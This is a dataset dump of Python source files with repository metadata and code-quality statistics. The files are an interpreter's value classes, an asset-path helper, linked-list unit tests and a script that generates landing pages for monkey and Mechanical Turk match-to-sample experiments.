hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8577046198ef7d67a4858d95eb40b25945bfbb0b | 1,843 | py | Python | python/tokens.py | santi/val-lang | f00c6617edc3963ac92f93f356c4b49a6ea4f525 | [
"MIT"
] | null | null | null | python/tokens.py | santi/val-lang | f00c6617edc3963ac92f93f356c4b49a6ea4f525 | [
"MIT"
] | null | null | null | python/tokens.py | santi/val-lang | f00c6617edc3963ac92f93f356c4b49a6ea4f525 | [
"MIT"
] | null | null | null |
class Value:
value = None
type = None
def __init__(self, value, type):
self.value = value
self.type = type
def __lt__(self, other):
if self.type != other.type:
raise ValueError(f"incompatible comparison between {self.type} and {other.type}")
return self.value < other.value
def __gt__(self, other):
if self.type != other.type:
raise ValueError(f"incompatible comparison between {self.type} and {other.type}")
return self.value > other.value
def __repr__(self):
return self.__str__()
def __str__(self):
return f"{str(self.type)}:{str(self.value)}"
class Field:
value = None
type = None
def __init__(self, value, type):
self.value = value
self.type = type
def __lt__(self, other):
if self.type != other.type:
raise ValueError(f"incompatible comparison between {self.type} and {other.type}")
return self.value < other.value
def __gt__(self, other):
if self.type != other.type:
raise ValueError(f"incompatible comparison between {self.type} and {other.type}")
return self.value > other.value
def __repr__(self):
return self.__str__()
def __str__(self):
return f"field:{str(self.value)}"
class Variable:
name = None
context = None
def __init__(self, name, context):
self.name = name
self.context = context
def __repr__(self):
return self.__str__()
def __str__(self):
return f"var:{self.name}"
def __getattr__(self, attr):
if attr == 'value':
return self.context[self.name].value
elif attr == 'type':
return self.context[self.name].type
else:
raise AttributeError(attr)
| 25.246575 | 93 | 0.59197 | 223 | 1,843 | 4.587444 | 0.139013 | 0.086022 | 0.068426 | 0.058651 | 0.773216 | 0.72434 | 0.72434 | 0.72434 | 0.72434 | 0.72434 | 0 | 0 | 0.296799 | 1,843 | 73 | 94 | 25.246575 | 0.789352 | 0 | 0 | 0.660377 | 0 | 0 | 0.174173 | 0.030928 | 0 | 0 | 0 | 0 | 0 | 1 | 0.264151 | false | 0 | 0 | 0.113208 | 0.660377 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
8583418e6823e5804bb94eb3f07ca0323b6501bc | 126 | py | Python | riptide_engine_docker/assets.py | theCapypara/riptide-engine-docker | 065eac0fcfe6d7de975082cabc9fb54ee1b1a422 | [
"MIT"
] | 1 | 2020-03-17T13:16:24.000Z | 2020-03-17T13:16:24.000Z | riptide_engine_docker/assets.py | theCapypara/riptide-engine-docker | 065eac0fcfe6d7de975082cabc9fb54ee1b1a422 | [
"MIT"
] | 3 | 2021-09-22T09:50:31.000Z | 2022-01-05T13:48:02.000Z | riptide_engine_docker/assets.py | theCapypara/riptide-engine-docker | 065eac0fcfe6d7de975082cabc9fb54ee1b1a422 | [
"MIT"
] | null | null | null | import pkg_resources
def riptide_engine_docker_assets_dir():
return pkg_resources.resource_filename(__name__, 'assets')
| 21 | 62 | 0.825397 | 16 | 126 | 5.8125 | 0.8125 | 0.258065 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103175 | 126 | 5 | 63 | 25.2 | 0.823009 | 0 | 0 | 0 | 0 | 0 | 0.047619 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 7 |
85a0f999658c9b10d5e1641c398f3666e48281ef | 7,026 | py | Python | tests/test_linked_lists.py | rm21845/ctci | 2b9d6fc13d51affbd01882b67277cf7c847a2c9c | [
"MIT"
] | null | null | null | tests/test_linked_lists.py | rm21845/ctci | 2b9d6fc13d51affbd01882b67277cf7c847a2c9c | [
"MIT"
] | null | null | null | tests/test_linked_lists.py | rm21845/ctci | 2b9d6fc13d51affbd01882b67277cf7c847a2c9c | [
"MIT"
] | null | null | null | import unittest
from ctci.structs.linkedlist import Node, LinkedList, SinglyLinkedList, DoublyLinkedList
class TestNode(unittest.TestCase):
def setUp(self):
self.zero = Node(0)
self.one = Node(1)
self.two = Node(2)
def test_value(self):
self.assertEqual(self.zero.value, 0)
def test_next_node(self):
self.zero.next_node = self.one
self.assertEqual(self.zero.next_node, self.one)
def test_prev_node(self):
self.two.prev_node = self.one
self.assertEqual(self.two.prev_node, self.one)
class TestLinkedList(unittest.TestCase):
def setUp(self):
self.a = LinkedList()
def test_insert_zero(self):
self.a.insert(0)
self.assertEqual(self.a.head.value, 0)
def test_insert_one(self):
self.a.insert(1)
self.a.insert(2)
self.a.insert(4)
self.assertEqual(self.a.head.value, 4)
def test_len_empty(self):
self.assertEqual(len(self.a), 0)
def test_len_one(self):
self.a.insert(3)
self.a.insert(2)
self.assertEqual(len(self.a), 2)
def test_len_two(self):
self.a.insert(3)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.assertEqual(len(self.a), 6)
def test_search_one(self):
self.a.insert(44)
found_node = self.a.search(44)
self.assertIsInstance(found_node, Node)
self.assertEqual(found_node.value, 44)
def test_search_two(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.insert(34)
self.a.insert(78)
found_node = self.a.search(78)
self.assertIsInstance(found_node, Node)
self.assertEqual(found_node.value, 78)
def test_search_three(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.insert(34)
self.a.insert(78)
found_node = self.a.search(67)
self.assertIsInstance(found_node, Node)
self.assertEqual(found_node.value, 67)
def test_search_no_exist(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.insert(34)
self.a.insert(78)
self.assertEqual(self.a.search(100), None)
def test_delete_zero(self):
self.a.insert(44)
self.a.delete(44)
self.assertEqual(self.a.search(66), None)
def test_delete_one(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.delete(66)
self.assertEqual(self.a.search(66), None)
def test_delete_two(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.delete(67)
self.assertEqual(self.a.search(67), None)
class TestSinglyLinkedList(unittest.TestCase):
def setUp(self):
self.a = SinglyLinkedList()
def test_len_empty(self):
self.assertEqual(len(self.a), 0)
def test_len_one(self):
self.a.insert(3)
self.a.insert(2)
self.assertEqual(len(self.a), 2)
def test_len_two(self):
self.a.insert(3)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.assertEqual(len(self.a), 6)
def test_insert_zero(self):
self.a.insert(0)
self.assertEqual(self.a.head.value, 0)
def test_insert_one(self):
self.a.insert(1)
self.a.insert(2)
self.a.insert(4)
self.assertEqual(self.a.head.value, 4)
def test_search_one(self):
self.a.insert(44)
found_node = self.a.search(44)
self.assertIsInstance(found_node, Node)
self.assertEqual(found_node.value, 44)
def test_search_two(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.insert(34)
self.a.insert(78)
found_node = self.a.search(78)
self.assertIsInstance(found_node, Node)
self.assertEqual(found_node.value, 78)
def test_search_no_exist(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.insert(34)
self.a.insert(78)
self.assertEqual(self.a.search(100), None)
def test_delete_zero(self):
self.a.insert(44)
self.a.delete(44)
self.assertEqual(self.a.search(66), None)
def test_delete_one(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.delete(66)
self.assertEqual(self.a.search(66), None)
def test_delete_two(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.delete(67)
self.assertEqual(self.a.search(67), None)
class TestDoublyLinkedList(unittest.TestCase):
def setUp(self):
self.a = DoublyLinkedList()
def test_len_empty(self):
self.assertEqual(len(self.a), 0)
def test_len_one(self):
self.a.insert(3)
self.a.insert(2)
self.assertEqual(len(self.a), 2)
def test_len_two(self):
self.a.insert(3)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.assertEqual(len(self.a), 6)
def test_insert_zero(self):
self.a.insert(0)
self.assertEqual(self.a.head.value, 0)
def test_insert_one(self):
self.a.insert(1)
self.a.insert(2)
self.a.insert(4)
self.assertEqual(self.a.head.value, 4)
def test_search_one(self):
self.a.insert(44)
found_node = self.a.search(44)
self.assertIsInstance(found_node, Node)
self.assertEqual(found_node.value, 44)
def test_search_two(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.insert(34)
self.a.insert(78)
found_node = self.a.search(78)
self.assertIsInstance(found_node, Node)
self.assertEqual(found_node.value, 78)
def test_search_no_exist(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.insert(34)
self.a.insert(78)
self.assertEqual(self.a.search(100), None)
def test_delete_zero(self):
self.a.insert(44)
self.a.delete(44)
self.assertEqual(self.a.search(66), None)
def test_delete_one(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.delete(66)
self.assertEqual(self.a.search(66), None)
def test_delete_two(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.delete(67)
self.assertEqual(self.a.search(67), None)
if __name__ == '__main__':
unittest.main() | 25.736264 | 88 | 0.582551 | 1,001 | 7,026 | 3.98002 | 0.053946 | 0.176958 | 0.262299 | 0.116717 | 0.911647 | 0.911647 | 0.873494 | 0.848645 | 0.848645 | 0.848645 | 0 | 0.049082 | 0.28665 | 7,026 | 273 | 89 | 25.736264 | 0.74581 | 0 | 0 | 0.882075 | 0 | 0 | 0.001138 | 0 | 0 | 0 | 0 | 0 | 0.207547 | 1 | 0.193396 | false | 0 | 0.009434 | 0 | 0.221698 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a458a9d22574c2c6821e02e4de871b7bc8094825 | 21,491 | py | Python | user_utils/make_examples.py | tdragoi/ptapreal | e45244c3d551e916cdad930543261e41005358d9 | [
"MIT"
] | null | null | null | user_utils/make_examples.py | tdragoi/ptapreal | e45244c3d551e916cdad930543261e41005358d9 | [
"MIT"
] | null | null | null | user_utils/make_examples.py | tdragoi/ptapreal | e45244c3d551e916cdad930543261e41005358d9 | [
"MIT"
] | null | null | null | import construct_landing_page as c
reload(c)
SAVE_LOCATION = '../public/landing_pages/examples/'
def makeInLabMTS():
IMAGEBAGS = 'https://s3.amazonaws.com/milresources/ImageBagMetaDefinitions/MutatorTraining_FullVarWithBGSetA.json'
GAME = {'gameId':'example_inlab_MTS',
"periodicRewardIntervalMsec":60000,
"periodicRewardAmount":1,
"onFinish":"continue",
"randomSeed":'none',
}
TASK_SEQUENCE = [{
"taskType":"MTS",
"sampleBagNames":['FullVarWithBGSetA_batch0obj0', 'FullVarWithBGSetA_batch0obj1',
'FullVarWithBGSetA_batch0obj2'],
"fixationXCentroid":0.5,
"fixationYCentroid":0.8,
"fixationDiameterDegrees":3,
"sampleXCentroid":0.5,
"sampleYCentroid":0.5,
"sampleDiameterDegrees":8,
"actionXCentroid":[0.3, 0.7],
"actionYCentroid":[0.8, 0.8],
"actionDiameterDegrees":[6, 6],
"choiceXCentroid":[0.3, 0.7],
"choiceYCentroid":[0.8, 0.8],
"choiceDiameterDegrees":[4, 4],
"choiceMap":{"FullVarWithBGSetA_batch0obj0":"FullVarWithBGSetA_batch0obj0",
"FullVarWithBGSetA_batch0obj1":"FullVarWithBGSetA_batch0obj1",
'FullVarWithBGSetA_batch0obj2':"FullVarWithBGSetA_batch0obj2"},
"sampleOnMsec":200,
"sampleOffMsec":0,
"choiceTimeLimitMsec":5000,
"punishTimeOutMsec":100,
"punishStreakTimeOutMultiplier":1,
"rewardTimeOutMsec":150,
"probabilityRepeatWhenWrong":0,
"averageReturnCriterion":0.8,
"minTrialsCriterion":5,
"sampleSampleWithReplacement":True,
"drawEyeFixationDot":True
}]
ENVIRONMENT = {
'playspace_degreesVisualAngle':24,
'playspace_verticalOffsetInches':0,
'playspace_viewingDistanceInches':8,
'screen_virtualPixelsPerInch':143.755902965,
'primary_reinforcer_type':'juice',
'action_event_type':['mouseup', 'touchstart', 'touchmove'],
'rigEnvironment':'monkeybox',
"bonusUSDPerCorrect":0.0005,
"juiceRewardPer1000Trials":250,
}
SESSION_PACKAGE = {'GAME_PACKAGE':{'IMAGEBAGS':IMAGEBAGS, 'TASK_SEQUENCE':TASK_SEQUENCE, 'GAME':GAME},
'ENVIRONMENT':ENVIRONMENT}
c.write_landing_page(SESSION_PACKAGE, agentId = 'example_inlab_worker', landingPageName = 'landingPage_InlabMTS.html', saveDirectoryPath = SAVE_LOCATION)
return
def makeInLabSR():
sessionPackage = '/MonkeyTurk_upstairs/Subjects/exampleSR.json'
c.write_landing_page(sessionPackage, agentId = 'example_inlab_worker', landingPageName = 'landingPage_InlabSR.html', saveDirectoryPath = SAVE_LOCATION)
return
def makeMechanicalTurkSR():
IMAGEBAGS = {"stimulus_objectome_flute":["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_flute_e0aed0e2c3f0c3cb7a7e235bd931f193a536391d_ty-0.85987_tz-0.38018_rxy-36.131_rxz152.6439_ryz28.9932_s1.4314.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_flute_2012a31313faa422b2623460d0c33a9f5eb3b238_ty-0.33547_tz-0.0026731_rxy-38.2159_rxz-115.311_ryz90.0954_s1.3508.png"],
"token_objectome_flute": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_flute.png"],
"stimulus_objectome_dog": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_dog_e1ed016de5e47e8a6567123ce134d72b7187db73_ty0.43294_tz-0.29943_rxy-112.6794_rxz75.5665_ryz127.211_s1.6328.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_dog_28ebb7db56691da21fa6d640f5ef719f916cb7ff_ty-0.48998_tz-0.20078_rxy-84.7937_rxz-117.8076_ryz175.5429_s1.3151.png"],
"token_objectome_dog": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_dog.png"],
"token_objectome_pineapple": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_pineapple.png"],
"stimulus_objectome_pineapple": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_pineapple_5946318bc2cdd1947534ae15d43aa7a0d820506e_ty-0.64759_tz0.33642_rxy-5.6836_rxz-71.4586_ryz62.4466_s1.169.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_pineapple_c50790daa826f1d3fbed5580820c6c91fdded273_ty-0.57074_tz0.84081_rxy-157.3224_rxz64.5421_ryz167.7568_s0.86084.png"]
}
GAME = {'gameId':'example_MechanicalTurk_SR',
"periodicRewardIntervalMsec":0,
"periodicRewardAmount":0,
"onFinish":"continue",
"minimumTrials":2,
"maximumTrials":800,
}
TASK_SEQUENCE = [{
"taskType":"SR",
"sampleBagNames":['stimulus_objectome_pineapple', 'stimulus_objectome_flute'],
"fixationXCentroid":0.5,
"fixationYCentroid":0.8,
"fixationDiameterDegrees":3,
"sampleXCentroid":0.5,
"sampleYCentroid":0.5,
"sampleDiameterDegrees":8,
"actionXCentroid":[0.3, 0.7],
"actionYCentroid":[0.8, 0.8],
"actionDiameterDegrees":[6, 6],
"choiceXCentroid":[0.3, 0.7],
"choiceYCentroid":[0.8, 0.8],
"choiceDiameterDegrees":[4, 4],
"rewardMap":{'stimulus_objectome_pineapple':[1, 0], 'stimulus_objectome_flute':[0, 1]},
"sampleOnMsec":200,
"sampleOffMsec":0,
"choiceTimeLimitMsec":5000,
"punishTimeOutMsec":400,
"punishStreakTimeOutMultiplier":1.2,
"rewardTimeOutMsec":150,
"probabilityRepeatWhenWrong":0,
"averageReturnCriterion":0.8,
"minTrialsCriterion":5,
"sampleSampleWithReplacement":False,
"drawEyeFixationDot":True
}]
GAME_PACKAGE = {'IMAGEBAGS':IMAGEBAGS, 'GAME':GAME, 'TASK_SEQUENCE':TASK_SEQUENCE}
ENVIRONMENT = {
'playspace_degreesVisualAngle':24,
'playspace_verticalOffsetInches':0,
'playspace_viewingDistanceInches':8,
'screen_virtualPixelsPerInch':143.755902965,
'primary_reinforcer_type':'monetary',
'action_event_type':['mouseup', 'touchstart', 'touchmove'],
'rigEnvironment':'mechanicalturk',
"bonusUSDPerCorrect":0.0005,
"juiceRewardPer1000Trials":250,
"instructionsDialogueString":"<ul><p><text style=\"font-weight:bold; font-size:large\">Thank you for your interest and contributing to research at at MIT!</text><pi><li>Please use the latest version of <b>Google Chrome</b> to work on this HIT. It may not work correctly on other browsers.<p><li>You will be presented with rapidly flashed images. <b>Your task is to figure out where to click on parts of the screen based on the information in the images.</b><p><li>The sound of a bell means you did something right, and received a small bonus reward.<p><li>Each trial begins with a <b>WHITE DOT</b>. Click the dot to begin the trial.<p><li>The HIT will submit <b>AUTOMATICALLY</b> after a certain number of trials. If the HIT freezes or does not submit, please contact us to resolve the issue and receive compensation for your time.<p><text style=\"color:#7A7A7A; font-size:smaller; font-style:italic\">If you cannot meet these requirements or if doing so could cause discomfort or injury, do not accept this HIT. You will not be penalized in any way.</text></ul>"
}
sessionPackage = {'GAME_PACKAGE':GAME_PACKAGE, 'ENVIRONMENT':ENVIRONMENT}
c.write_landing_page(sessionPackage, agentId = None, landingPageName = 'landingPage_MechanicalTurkSR.html', saveDirectoryPath = SAVE_LOCATION)
return
def makeMechanicalTurkMTS():
IMAGEBAGS = {"stimulus_objectome_flute":["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_flute_e0aed0e2c3f0c3cb7a7e235bd931f193a536391d_ty-0.85987_tz-0.38018_rxy-36.131_rxz152.6439_ryz28.9932_s1.4314.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_flute_2012a31313faa422b2623460d0c33a9f5eb3b238_ty-0.33547_tz-0.0026731_rxy-38.2159_rxz-115.311_ryz90.0954_s1.3508.png"],
"token_objectome_flute": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_flute.png"],
"stimulus_objectome_dog": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_dog_e1ed016de5e47e8a6567123ce134d72b7187db73_ty0.43294_tz-0.29943_rxy-112.6794_rxz75.5665_ryz127.211_s1.6328.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_dog_28ebb7db56691da21fa6d640f5ef719f916cb7ff_ty-0.48998_tz-0.20078_rxy-84.7937_rxz-117.8076_ryz175.5429_s1.3151.png"],
"token_objectome_dog": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_dog.png"],
"token_objectome_pineapple": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_pineapple.png"],
"stimulus_objectome_pineapple": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_pineapple_5946318bc2cdd1947534ae15d43aa7a0d820506e_ty-0.64759_tz0.33642_rxy-5.6836_rxz-71.4586_ryz62.4466_s1.169.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_pineapple_c50790daa826f1d3fbed5580820c6c91fdded273_ty-0.57074_tz0.84081_rxy-157.3224_rxz64.5421_ryz167.7568_s0.86084.png"]
}
GAME = {'gameId':'example_MechanicalTurk_MTS',
"periodicRewardIntervalMsec":0,
"periodicRewardAmount":0,
"onFinish":"continue",
"minimumTrials":2,
"maximumTrials":800,
}
TASK_SEQUENCE = [{
"taskType":"MTS",
"sampleBagNames":['stimulus_objectome_pineapple', 'stimulus_objectome_flute'],
"fixationXCentroid":0.5,
"fixationYCentroid":0.8,
"fixationDiameterDegrees":3,
"sampleXCentroid":0.5,
"sampleYCentroid":0.5,
"sampleDiameterDegrees":8,
"actionXCentroid":[0.3, 0.7],
"actionYCentroid":[0.8, 0.8],
"actionDiameterDegrees":[6, 6],
"choiceXCentroid":[0.3, 0.7],
"choiceYCentroid":[0.8, 0.8],
"choiceDiameterDegrees":[4, 4],
"choiceMap":{"stimulus_objectome_flute":"token_objectome_flute",
"stimulus_objectome_pineapple":"token_objectome_pineapple",
'stimulus_objectome_dog':"token_objectome_dog"},
"sampleOnMsec":200,
"sampleOffMsec":0,
"choiceTimeLimitMsec":5000,
"punishTimeOutMsec":400,
"punishStreakTimeOutMultiplier":1.2,
"rewardTimeOutMsec":150,
"probabilityRepeatWhenWrong":0,
"averageReturnCriterion":0.8,
"minTrialsCriterion":5,
"sampleSampleWithReplacement":False,
"drawEyeFixationDot":True
}]
GAME_PACKAGE = {'IMAGEBAGS':IMAGEBAGS, 'GAME':GAME, 'TASK_SEQUENCE':TASK_SEQUENCE}
ENVIRONMENT = {
'playspace_degreesVisualAngle':24,
'playspace_verticalOffsetInches':0,
'playspace_viewingDistanceInches':8,
'screen_virtualPixelsPerInch':143.755902965,
'primary_reinforcer_type':'monetary',
'action_event_type':['mouseup', 'touchstart', 'touchmove'],
'rigEnvironment':'mechanicalturk',
"bonusUSDPerCorrect":0.0005,
"juiceRewardPer1000Trials":250,
"instructionsDialogueString":"<ul><p><text style=\"font-weight:bold; font-size:large\">Thank you for your interest and contributing to research at at MIT!</text><pi><li>Please use the latest version of <b>Google Chrome</b> to work on this HIT. It may not work correctly on other browsers.<p><li>You will be presented with rapidly flashed images. <b>Your task is to match images with the one that was rapidly flashed (this will become clear after you try a few trials).</b><p><li>The sound of a bell means you did something right, and received a small bonus reward.<p><li>Each trial begins with a <b>WHITE DOT</b>. Click the dot to begin the trial.<p><li>The HIT will submit <b>AUTOMATICALLY</b> after a certain number of trials. If the HIT freezes or does not submit, please contact us to resolve the issue and receive compensation for your time.<p><text style=\"color:#7A7A7A; font-size:smaller; font-style:italic\">If you cannot meet these requirements or if doing so could cause discomfort or injury, do not accept this HIT. You will not be penalized in any way.</text></ul>"
}
sessionPackage = {'GAME_PACKAGE':GAME_PACKAGE, 'ENVIRONMENT':ENVIRONMENT}
c.write_landing_page(sessionPackage, agentId = None, landingPageName = 'landingPage_MechanicalTurkMTS.html', saveDirectoryPath = SAVE_LOCATION)
return
def makeMechanicalTurkSwitcher():
IMAGEBAGS = {"stimulus_objectome_flute":["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_flute_e0aed0e2c3f0c3cb7a7e235bd931f193a536391d_ty-0.85987_tz-0.38018_rxy-36.131_rxz152.6439_ryz28.9932_s1.4314.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_flute_2012a31313faa422b2623460d0c33a9f5eb3b238_ty-0.33547_tz-0.0026731_rxy-38.2159_rxz-115.311_ryz90.0954_s1.3508.png"],
"token_objectome_flute": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_flute.png"],
"stimulus_objectome_dog": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_dog_e1ed016de5e47e8a6567123ce134d72b7187db73_ty0.43294_tz-0.29943_rxy-112.6794_rxz75.5665_ryz127.211_s1.6328.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_dog_28ebb7db56691da21fa6d640f5ef719f916cb7ff_ty-0.48998_tz-0.20078_rxy-84.7937_rxz-117.8076_ryz175.5429_s1.3151.png"],
"token_objectome_dog": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_dog.png"],
"token_objectome_pineapple": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_pineapple.png"],
